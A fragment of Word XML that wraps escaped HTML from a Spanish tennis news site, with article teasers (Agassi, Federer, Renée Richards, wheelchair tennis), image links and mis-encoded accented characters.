    <w:p w14:paraId="56DC4D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5C9C00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7C51E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"http://todosobretenis.com/wp-content/uploads/2019/10/b31922a0-0131-4d86-93ed-160ef32c6a3e-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2019/10/b31922a0-0131-4d86-93ed-160ef32c6a3e-150x150.jpg 150w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103F915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71B654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7AC7F8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4A72B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7C4E95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DD952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4551F4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41F9F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7C25FA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807409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294596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El coleccionista de raquetas amigo de Vilas &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB44E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La historia de Alejandro Diorio,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393101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el coleccionista de raquetas que logrÃ³ hacerse amigo del gran Vilas &lt; /p&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28048FD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520E66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0D897A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6E30E9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658208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4884C2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"http://todosobretenis.com/sabes-elegir-raqueta/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282269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4B3307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FBBA2C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5C60F8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F3492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6EDAB4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73E2A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06ECF9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C24B0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3696DA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545038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"http://todosobretenis.com/wp-content/uploads/2017/10/como-elegir-tu-raqueta-400x240.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A3BA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38413B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 / &gt; &lt; img width = "80"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398F14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411E21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"http://todosobretenis.com/wp-content/uploads/2017/10/como-elegir-tu-raqueta-80x80.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFC6A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5D9895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1B7C6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"http://todosobretenis.com/wp-content/uploads/2017/10/como-elegir-tu-raqueta-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2017/10/como-elegir-tu-raqueta-150x150.jpg 150w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4257F3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4332C6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0DE451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B0F4D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65242F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84133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38628C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&lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C138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0AABA7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63DDE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3E8467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Â¿ Sabes cÃ³ mo elegir tu raqueta ? &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7871B5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Te damos algunos tips para que puedas elegir la raqueta indicada &lt; /p&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D40C2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785FC3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0CD570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734399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0356C44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2B3EB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"http://todosobretenis.com/odio-los-llevo-la-gloria/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B53BB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65F50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1A3AA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5EDDC8D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D6F4F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325268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E6F11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25FB12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029F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7BB894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731B1D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"http://todosobretenis.com/wp-content/uploads/2017/10/agasi-400x240.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7234A8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6931EB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3B2770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"http://todosobretenis.com/wp-content/uploads/2017/10/agasi-400x240.jpg 400w, http://todosobretenis.com/wp-content/uploads/2017/10/agasi-590x354.jpg 590w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7324C82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651EA0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62FF90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"http://todosobretenis.com/wp-content/uploads/2017/10/agasi-80x80.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015E69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1DF041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50CE2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"http://todosobretenis.com/wp-content/uploads/2017/10/agasi-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2017/10/agasi-150x150.jpg 150w, http://todosobretenis.com/wp-content/uploads/2017/10/agasi-560x554.jpg 560w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6987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3D7B73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43F9EE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63AB0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74880C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25153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4F05A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3CC13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37252C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829670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576204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El odio los llevÃ³ a la gloria &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6664F2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CÃ³ mo a pesar de odiar el tenis,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49ABE4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Andre Agassi pudo ser uno del deporte &lt; /p&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6263D3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2ABD11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324EB02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0FC8FD4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2CA91AE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6E7909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"http://todosobretenis.com/se-cambian-las-pelotas-nueve-games-los-partidos/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34658C9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36D00F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6FF7C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725D8A5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99172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2BDB5C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96C00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5F5C9D7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F1101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4A8376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3069D0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"http://todosobretenis.com/wp-content/uploads/2017/09/ball-boy-tenis--400x240.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667F26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370413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 / &gt; &lt; img width = "80"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32638C5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300AC1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"http://todosobretenis.com/wp-content/uploads/2017/09/ball-boy-tenis--80x80.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BCFF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18AB49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E2ADA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"http://todosobretenis.com/wp-content/uploads/2017/09/ball-boy-tenis--80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2017/09/ball-boy-tenis--150x150.jpg 150w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1390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028B7E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3C762F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D0BA5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62E71E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788E6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39F4B9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C6FD9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69FB80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07F5D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1231A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Â¿ Por quÃ© se cambian las pelotas cada nueve games durante los partidos ? &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB1885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En todos los partidos,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C791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cada nueve games se cambian las pelotas.ConocÃ© el motivo &lt; /p&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2786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3D70B8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28687D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4BAD8A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5B9F1A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01CEC7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"http://todosobretenis.com/cuando-el-tenis-se-transforma-en-rina-de-gallos/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BBAD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EFD56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7F44A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31EB32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6FE23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7E91E5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E2CE6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5BA67A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CBC7D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063354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7A4DE3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"http://todosobretenis.com/wp-content/uploads/2015/08/los-dos--400x240.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190CA3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14F956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3C81B8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"http://todosobretenis.com/wp-content/uploads/2015/08/los-dos--400x240.jpg 400w, http://todosobretenis.com/wp-content/uploads/2015/08/los-dos--1000x600.jpg 1000w, http://todosobretenis.com/wp-content/uploads/2015/08/los-dos--590x354.jpg 590w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57845C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0BCC9B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height = "80"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438932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"http://todosobretenis.com/wp-content/uploads/2015/08/los-dos--80x80.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015E2A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149E93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28CCE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"http://todosobretenis.com/wp-content/uploads/2015/08/los-dos--80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2015/08/los-dos--150x150.jpg 150w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEAEE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65D2D7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649F1C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7111B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7666F0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635E0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3BE453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176F0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0AF02F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B63A3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788150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Cuando el tenis se transforma en riÃ± a de gallos &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FC4E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Recordamos algunas de las peleas mÃ¡ s insÃ³ litas dentro de una cancha de tenis &lt; /p&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514DE2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340600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65472C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76765A6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35778A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46156C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"http://todosobretenis.com/cuando-federer-fue-numero-uno-primera-vez/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F00F41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22A062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DE734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29E0A1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9959C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6BA6008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A6E746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5A73C8D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6EDAA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06AE8B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712D91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"http://todosobretenis.com/wp-content/uploads/2018/05/federer-primera-vez-400x240.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2148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23D42A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D6D60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"http://todosobretenis.com/wp-content/uploads/2018/05/federer-primera-vez-400x240.jpg 400w, http://todosobretenis.com/wp-content/uploads/2018/05/federer-primera-vez-590x354.jpg 590w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0825CA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2CCE74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075B9A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"http://todosobretenis.com/wp-content/uploads/2018/05/federer-primera-vez-80x80.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60400B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140DFC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77AA89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"http://todosobretenis.com/wp-content/uploads/2018/05/federer-primera-vez-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2018/05/federer-primera-vez-150x150.jpg 150w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646A87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65EFB24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37971E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B7C73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305B38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68BA9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6E80C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F2CFE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6C24B4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728B0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4EF4C3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Cuando Federer fue nÃºmero uno por primera vez &amp; #8230;&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0A19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&lt;p&gt;Bastantes cosas han cambiado desde que el suizo se proclamarÃ¡ nÃºmero por primera vez.&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6172AA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&lt;/div&gt;&lt;!--mvp-flex-story-text---&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070114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&lt;/div&gt;&lt;!--mvp-flex-story-in--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7F4AB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&lt;/div&gt;&lt;!--mvp-flex-story-out--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6161CC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&lt;/div&gt;&lt;!--mvp-flex-story--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF061E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&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E80B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</w:r>
      <w:r w:rsidRPr="00BE2D6D">
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;a href= "http://todosobretenis.com/el-deseo-de-ser-jugadora-de-tenis-renee-richards/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38024C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4B49A4A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33D58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437A1B0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E6C53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5CC5B1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73D425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7426C1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DEB3F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14F1C79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1A8284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"http://todosobretenis.com/wp-content/uploads/2015/05/renee-richards-400x240.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C19A0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1E2515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0FA6A7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"http://todosobretenis.com/wp-content/uploads/2015/05/renee-richards-400x240.jpg 400w, http://todosobretenis.com/wp-content/uploads/2015/05/renee-richards-1000x600.jpg 1000w, http://todosobretenis.com/wp-content/uploads/2015/05/renee-richards-590x354.jpg 590w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0763E1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1DDD897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56EFAFC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"http://todosobretenis.com/wp-content/uploads/2015/05/renee-richards-80x80.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4437A1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252DA3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2F441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"http://todosobretenis.com/wp-content/uploads/2015/05/renee-richards-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2015/05/renee-richards-150x150.jpg 150w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F83D0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0EE1EE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0C7839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B339C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060B609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D8648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239316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CC439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6EF093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E6A5A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711547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El deseo de ser jugadora de tenis : RenÃ© e Richards Â &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5864FC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La historia de la tenista trans que fue rechazada en el circuito cuando se enteraron de su condiciÃ³ n sexual &lt; /p&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352B1B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51D625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1F6D12C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367759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/div&gt;&lt;!--mvp-flex-story--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBDF08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60C26F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"http://todosobretenis.com/cuando-la-tierra-de-madrid-fue-azul-2/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4C7FA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77C94D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0C07D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 mvp-flex-col-noad" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73920A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4BAA1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46DA802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774665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5786D4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A8866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0DD1F80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4B24D3B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"http://todosobretenis.com/wp-content/uploads/2018/05/madrid-azul--400x240.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDC30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404B46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2CA80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"http://todosobretenis.com/wp-content/uploads/2018/05/madrid-azul--400x240.jpg 400w, http://todosobretenis.com/wp-content/uploads/2018/05/madrid-azul--1000x600.jpg 1000w, http://todosobretenis.com/wp-content/uploads/2018/05/madrid-azul--590x354.jpg 590w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA2B9B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76BCB7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40EA67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"http://todosobretenis.com/wp-content/uploads/2018/05/madrid-azul--80x80.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA1F0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0E88AD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C6540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"http://todosobretenis.com/wp-content/uploads/2018/05/madrid-azul--80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2018/05/madrid-azul--150x150.jpg 150w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435B92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2B0793C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5CBCCE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24DA75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081A329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01481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5DC1D4D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00E80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Curiosidades &lt; /span&gt;&lt;span class="mvp-cd-date left relative"&gt;dÃ­as atras&lt;/span &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7754B9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8532C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79E6E3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Cuando el polvo de ladrillo de Madrid fue azul &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B6B8E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El Masters 1000 de Madrid fue el primer e Ãºnico torneo en tener polvo de ladrillo azul &lt; /p&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E153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1C5156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7775E30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0092D99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1CB20DC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75C6A3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/div&gt;&lt;!--mvp-flex-story-wrap--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606D955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/div&gt;&lt;!--mvp-widget-flex-wrap--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670763E7" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2190765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E182D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/div&gt;&lt;/section &gt; &lt; section id = "mvp_flex_widget-12"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408684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"mvp-widget-home left relative mvp_flex_widget" &gt; &lt; div class = "mvp-main-box" &gt; &lt; div class = "mvp-widget-home-head" &gt; &lt; h4 class = "mvp-widget-home-title" &gt; &lt; span class = "mvp-widget-home-title" &gt; Tenis adaptado &lt; /span&gt;&lt;/h4 &gt; &lt; /div&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038899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"mvp-widget-flex-wrap left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A83C15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B9D5C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"mvp-flex-side-out left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE548C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D265A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"mvp-flex-side-in" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036CC61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EF8254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"mvp-flex-story-wrap left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BB65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041C0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"http://todosobretenis.com/es-muy-diferente-el-tenis-adaptado-al-tenis-de-pie/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758AE5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6CA1A1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FBC01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mvp-flex-col" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A818A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6ABE3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5B48BD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098F1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5680CC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63B60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4EE85F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439818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"http://todosobretenis.com/wp-content/uploads/2016/05/dani-caver-400x240.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF8F6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wp-post-image"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3610AF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391CEC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"http://todosobretenis.com/wp-content/uploads/2016/05/dani-caver-400x240.jpg 400w, http://todosobretenis.com/wp-content/uploads/2016/05/dani-caver-590x354.jpg 590w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B70D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7A95C0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5E07EA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"http://todosobretenis.com/wp-content/uploads/2016/05/dani-caver-80x80.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C8ED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675ABE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F42BF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"http://todosobretenis.com/wp-content/uploads/2016/05/dani-caver-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2016/05/dani-caver-150x150.jpg 150w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBC481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782569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4E50FF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478FB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0047DF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047FE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45005A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99069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Tenis adaptado &lt; /span&gt;&lt;span class="mvp-cd-date left relative"&gt;dÃ­as atras&lt;/span &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743DAE4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D539E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0BE904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Â¿ Es muy diferente el tenis en silla de ruedas al tenis de pie ? &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0561C4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Las principales diferencias entre el tenis en silla de ruedas y el tenis de pie &lt; /p&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B3FD8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1E1242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3D8EA25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23F5A1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2134BA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7EED20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"http://todosobretenis.com/mi-primera-experiencia-en-el-tenis-de-sillas-de-ruedas/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F95D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E8600F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5DF3C4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 left relative mvp-flex-col" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3017322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4EBBF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"mvp-flex-story-out right relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632E1A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ACAA7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"mvp-flex-story-img left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B869B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60C3F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1EDAF8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5188146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"http://todosobretenis.com/wp-content/uploads/2016/05/WhatsApp-Image-2020-03-19-at-03.00.30-400x240.jpeg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C83D9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class = "mvp-reg-img wp-post-image"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19400A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8EDAE5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"http://todosobretenis.com/wp-content/uploads/2016/05/WhatsApp-Image-2020-03-19-at-03.00.30-400x240.jpeg 400w, http://todosobretenis.com/wp-content/uploads/2016/05/WhatsApp-Image-2020-03-19-at-03.00.30-1000x600.jpeg 1000w, http://todosobretenis.com/wp-content/uploads/2016/05/WhatsApp-Image-2020-03-19-at-03.00.30-590x354.jpeg 590w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6146AC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6F4FDE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6616D4F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"http://todosobretenis.com/wp-content/uploads/2016/05/WhatsApp-Image-2020-03-19-at-03.00.30-80x80.jpeg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F528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wp-post-image"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C23751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75092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"http://todosobretenis.com/wp-content/uploads/2016/05/WhatsApp-Image-2020-03-19-at-03.00.30-80x80.jpeg 80w, http://todosobretenis.com/wp-content/uploads/2016/05/WhatsApp-Image-2020-03-19-at-03.00.30-150x150.jpeg 150w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091EB3A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/div&gt;&lt;!--mvp-flex-story-img---&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DFBE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"mvp-flex-story-in" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A3C4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0B542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"mvp-flex-story-text left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B4D7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8B19D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00EF07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D007A7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Tenis adaptado &lt; /span&gt;&lt;span class="mvp-cd-date left relative"&gt;dÃ­as atras&lt;/span &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466813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1B9937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75C21C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La primera experiencia de un coach entrenando a un tenista de tenis adaptado &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5489142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Martin Roca cuenta cÃ³ mo fue la experiencia de entrenar a un jugador de tenis adaptado &lt; /p&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D6165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/div&gt;&lt;!--mvp-flex-story-text---&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15241E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/div&gt;&lt;!--mvp-flex-story-in--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B07AD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/div&gt;&lt;!--mvp-flex-story-out--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E646C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/div&gt;&lt;!--mvp-flex-story--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9EB7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7D0109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/div&gt;&lt;!--mvp-flex-story-wrap--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCDE1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/div&gt;&lt;!--mvp-flex-side-in--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14455D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"mvp-flex-side-wrap left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442D9B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4ACD5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"mvp-flex-ad left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1582F1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B7F96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"mvp-ad-label" &gt; Anuncio &lt; /span&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B12B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strong &gt; &lt; a href = "www.terromekioscos.com.ar" &gt; &lt; img class = "aligncenter wp-image-31118 size-large"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF17B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"http://todosobretenis.com/wp-content/uploads/2021/03/GRAF-6-FEED-1024x1024.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1AC6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447558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width = "300"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA98C5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"250" / &gt; &lt; /a&gt;&lt;/strong &gt; &lt; /div&gt;&lt;!--mvp-flex-ad--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4679AD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/div&gt;&lt;!--mvp-flex-side-wrap--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F209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/div&gt;&lt;!--mvp-flex-side-out--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146DB0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/div&gt;&lt;!--mvp-widget-flex-wrap--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0C4726" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25125B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C47E1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/div&gt;&lt;/section &gt; &lt; section id = "mvp_home_feat2_widget-7"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA1748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"mvp-widget-home left relative mvp_home_feat2_widget" &gt; &lt; div class = "mvp-main-box" &gt; &lt; div class = "mvp-widget-home-head" &gt; &lt; h4 class = "mvp-widget-home-title" &gt; &lt; span class = "mvp-widget-home-title" &gt; POR SI TE LO PERDISTE &lt; /span&gt;&lt;/h4 &gt; &lt; /div&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590091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"mvp-widget-feat2-wrap left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DE6E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14AAEB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"mvp-widget-feat2-out left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691E41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8D612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"mvp-widget-feat2-in" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5788DED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8D930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"mvp-widget-feat2-main left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F171B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475B8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"mvp-widget-feat2-left left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2324E3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940994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"http://todosobretenis.com/nadal-me-pone-triste-la-operacion-de-del-potro/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4522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5D4FC6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88C4CA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"mvp-widget-feat2-left-cont left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1966342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0EBBB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"mvp-feat1-feat-img left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E951A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9381B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"560"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28754BD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"600"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EBD0F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"http://todosobretenis.com/wp-content/uploads/2020/01/los-dos-560x600.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBDA8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"attachment-mvp-port-thumb size-mvp-port-thumb wp-post-image"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F8AC0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 / &gt; &lt; /div&gt;&lt;!--mvp-feat1-feat-img--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EC4AD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"mvp-feat1-feat-text left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0083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DD3240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3819C1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F2A350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Declaraciones &lt; /span&gt;&lt;span class="mvp-cd-date left relative"&gt;dÃ­as atras&lt;/span &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2141C8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3B4D6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7B8B23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class = "mvp-stand-title" &gt; Nadal : â€ œMe pone triste la operaciÃ³ n de Del Potroâ€ &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E7248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Luego de su victoria frente a Nick Kyrgios,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757186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el espaÃ± ol hablÃ³ sobre el tenista argentino y de su vuelta a... &lt; /p&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5495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/div&gt;&lt;!--mvp-feat1-feat-text--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF207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/div&gt;&lt;!--mvp-widget-feat2-left-cont--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0208D6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2817187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/div&gt;&lt;!--mvp-widget-feat2-left--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1911A9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"mvp-widget-feat2-right left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55922E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3FDAB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"http://todosobretenis.com/suspendieron-de-por-vida-a-joao-souza-por-el-arreglo-de-partidos/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A8196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6CE238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D9457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"mvp-widget-feat2-right-cont left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDF2D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2F006F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"mvp-widget-feat2-right-img left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4870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F1383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6AA401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30CBD6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"http://todosobretenis.com/wp-content/uploads/2020/01/souzaa-400x240.jpeg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FB8C4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lazy wp-post-image"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4231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56099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"http://todosobretenis.com/wp-content/uploads/2020/01/souzaa-400x240.jpeg 400w, http://todosobretenis.com/wp-content/uploads/2020/01/souzaa-1000x600.jpeg 1000w, http://todosobretenis.com/wp-content/uploads/2020/01/souzaa-590x354.jpeg 590w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F5BA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5F0942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01515BD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"http://todosobretenis.com/wp-content/uploads/2020/01/souzaa-80x80.jpeg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293C4C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lazy wp-post-image"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093C65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6D0093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"http://todosobretenis.com/wp-content/uploads/2020/01/souzaa-80x80.jpeg 80w, http://todosobretenis.com/wp-content/uploads/2020/01/souzaa-150x150.jpeg 150w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A18CC3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sizes = "(max-width: 80px) 100vw, 80px" / &gt; &lt; /div&gt;&lt;!--mvp-widget-feat2-right-img--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345F21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"mvp-widget-feat2-right-text left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A1F0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F8101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33101E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C5D329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Noticias &lt; /span&gt;&lt;span class="mvp-cd-date left relative"&gt;dÃ­as atras&lt;/span &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6A6CD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3DF92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330B1E2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Suspendieron de por vida a Joao Souza por el arreglo de partidos &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C90FB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/div&gt;&lt;!--mvp-widget-feat2-right-text--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711C0A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/div&gt;&lt;!--mvp-widget-feat2-right-cont--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB8C0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59C5621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"http://todosobretenis.com/la-atp-probara-la-revision-electronica-en-arcilla/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045064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B3D5C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C22AEB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"mvp-widget-feat2-right-cont left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79965C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87324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"mvp-widget-feat2-right-img left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1438F3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7EF18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"400"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A891C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"240"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5927E90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"http://todosobretenis.com/wp-content/uploads/2020/01/rio-de-janeiro-2020-centre-court-400x240.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2349B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"mvp-reg-img lazy wp-post-image"</w:t>
      </w:r>
    </w:p>
